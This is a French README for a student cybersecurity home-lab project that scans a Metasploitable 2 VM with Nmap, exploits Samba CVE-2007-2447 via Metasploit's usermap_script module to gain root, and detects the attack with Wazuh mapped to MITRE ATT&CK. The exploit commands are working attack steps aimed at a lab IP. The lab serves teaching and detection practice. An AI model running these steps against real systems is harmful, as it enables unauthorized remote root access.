
Labo d'attaque isolé AD/Linux : exploitation de CVE-2007-2447 via Metasploit, détection avec Wazuh SIEM mappé sur MITRE ATT&CK (T1190, T1059)
Projet B.Tech (BTP) | IIIT Pune Basé sur : « Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring » — ICCCNT 2023, IIT Delhi
Un laboratoire maison de cybersécurité entièrement fonctionnel, construit sur une seule machine à l'aide d'outils gratuits et open source. Le laboratoire simule un cycle d'attaque réel — Reconnaissance → Exploitation → Détection — et démontre comment un SIEM peut détecter les attaques et les cartographier en temps réel vers le framework MITRE ATT&CK.
┌─────────────────────────────────────────────────┐
│ VirtualBox — Internal Network │
│ (cyberlab, 10.0.0.x/24) │
│ │
│ ┌──────────┐ ┌──────────────┐ ┌──────────┐ │
│ │ Kali │ │ Metasploitable│ │ Ubuntu │ │
│ │ 10.0.0.1 │◄─►│ 10.0.0.2 │◄─►│ 10.0.0.3 │ │
│ │ ATTACKER │ │ VICTIM │ │ SIEM │ │
│ └──────────┘ └──────────────┘ └──────────┘ │
└─────────────────────────────────────────────────┘
Host-Only Adapter (192.168.56.103)
→ Wazuh Dashboard access from browser
| VM | Rôle | IP | Outils |
|---|---|---|---|
| Kali Linux 2026.1 | Attaquant | 10.0.0.1 | Nmap, Metasploit |
| Metasploitable 2 | Victime | 10.0.0.2 | 20+ vulnérabilités |
| Ubuntu 22.04 + Wazuh | SIEM | 10.0.0.3 | Wazuh v4.7.5 |
| Outil | Version | Rôle |
|---|---|---|
| VirtualBox | 7.x | Hyperviseur — exécute toutes les VM sur un seul hôte |
| Kali Linux | 2026.1 | OS de test d'intrusion (offensif) |
| Metasploitable 2 | v2.0 | Cible intentionnellement vulnérable |
| Wazuh | v4.7.5 | SIEM open source (défensif) |
| Nmap | Dernière | Scan de réseau/ports |
| Metasploit Framework | Dernière | Framework d'exploitation |
Créez un réseau interne nommé cyberlab dans VirtualBox. Les trois VM utilisent cet adaptateur. La VM Ubuntu/Wazuh reçoit un adaptateur host-only supplémentaire afin que vous puissiez accéder au tableau de bord depuis votre navigateur.
cyberlab# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.1
netmask 255.255.255.0
sudo systemctl restart networkingcyberlab# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.2
netmask 255.255.255.0
⚠️ N'exposez jamais Metasploitable 2 sur Internet. Il est intentionnellement non sécurisé.
cyberlab interne + Host-Only/etc/netplan/01-network-manager-all.yaml) :network:
version: 2
renderer: NetworkManager
ethernets:
enp0s3:
addresses:
- 10.0.0.3/24
enp0s8:
dhcp4: true
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
https://192.168.56.103 (depuis le navigateur de l'hôte)Comme Metasploitable 2 ne peut pas exécuter d'agent Wazuh, configurez le transfert syslog pour une surveillance sans agent :
Sur Metasploitable, ajoutez dans /etc/rsyslog.conf :
*.* @10.0.0.3:514
Sur Wazuh (Ubuntu), activez l'entrée syslog dans /var/ossec/etc/ossec.conf :
<remote>
<connection>syslog</connection>
<port>514</port>
<protocol>udp</protocol>
</remote>
Redémarrez Wazuh : sudo systemctl restart wazuh-manager
# From Kali
nmap -sV -O 10.0.0.2
Services clés découverts sur Metasploitable 2 :
| Port | Service | Version |
|---|---|---|
| 21/tcp | FTP | vsftpd 2.3.4 |
| 22/tcp | SSH | OpenSSH 4.7p1 |
| 80/tcp | HTTP | Apache 2.2.8 |
| 139/445 | SMB | Samba 3.x–4.x |
| 3306/tcp | MySQL | 5.0.51a |
| 5432/tcp | PostgreSQL | 8.3 |
Plus de 20 ports ouverts découverts. OS identifié : Linux 2.6.x
Vulnérabilité : CVE-2007-2447 — Injection de commande usermap_script dans Samba
Permet une exécution de code à distance sans authentification via des requêtes MS-RPC malformées sur Samba 3.0.0–3.0.25rc3.
# From Kali — launch Metasploit
msfconsole
# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run
# Verify root access
whoami
# Output: root
Après l'exploit, Wazuh a automatiquement détecté et cartographié les événements vers MITRE ATT&CK :
| ID de règle | Description | Technique MITRE | Tactique |
|---|---|---|---|
| 5402 | sudo vers ROOT exécuté avec succès | T1548.003 | Élévation de privilèges |
| 5501 | PAM : session de connexion ouverte | T1078 | Accès initial / Persistance |
| 5502 | PAM : session de connexion fermée | T1078 | Contournement de la défense |
| 502 | Serveur Wazuh démarré | — | Détection active |
Nombre total d'événements détectés : 55+
Accédez au tableau de bord à https://192.168.56.103 → Security Events → MITRE ATT&CK
cybersecurity-home-lab/
│
├── README.md ← You are here
├── network-config/
│ ├── kali-interfaces.txt ← Kali static IP config
│ ├── metasploitable-interfaces.txt
│ └── ubuntu-netplan.yaml ← Ubuntu/SIEM netplan config
├── wazuh-config/
│ └── ossec.conf ← Wazuh syslog/agent config
├── screenshots/
│ ├── nmap-scan.png
│ ├── metasploit-exploit.png
│ ├── wazuh-dashboard.png
│ └── wazuh-alerts-table.png
└── report/
└── ICCCNT_2023_paper.pdf ← Reference research paper
Dadiyala, C. et al. (2023). Designing and Implementing an Effective Cybersecurity Home Lab for Detection and Monitoring. 14th International Conference on Computing, Communication and Networking Technologies (ICCCNT), IIT Delhi. IEEE-56998.
Ce laboratoire est entièrement construit sur des machines virtuelles isolées, sans accès Internet pendant les simulations d'attaque. Tous les outils et techniques sont utilisés strictement à des fins éducatives dans un environnement contrôlé. N'essayez pas de reproduire des techniques d'attaque sur des systèmes qui ne vous appartiennent pas ou pour lesquels vous n'avez pas d'autorisation explicite de test.
Présenté par Harshita Verma | IIIT Pune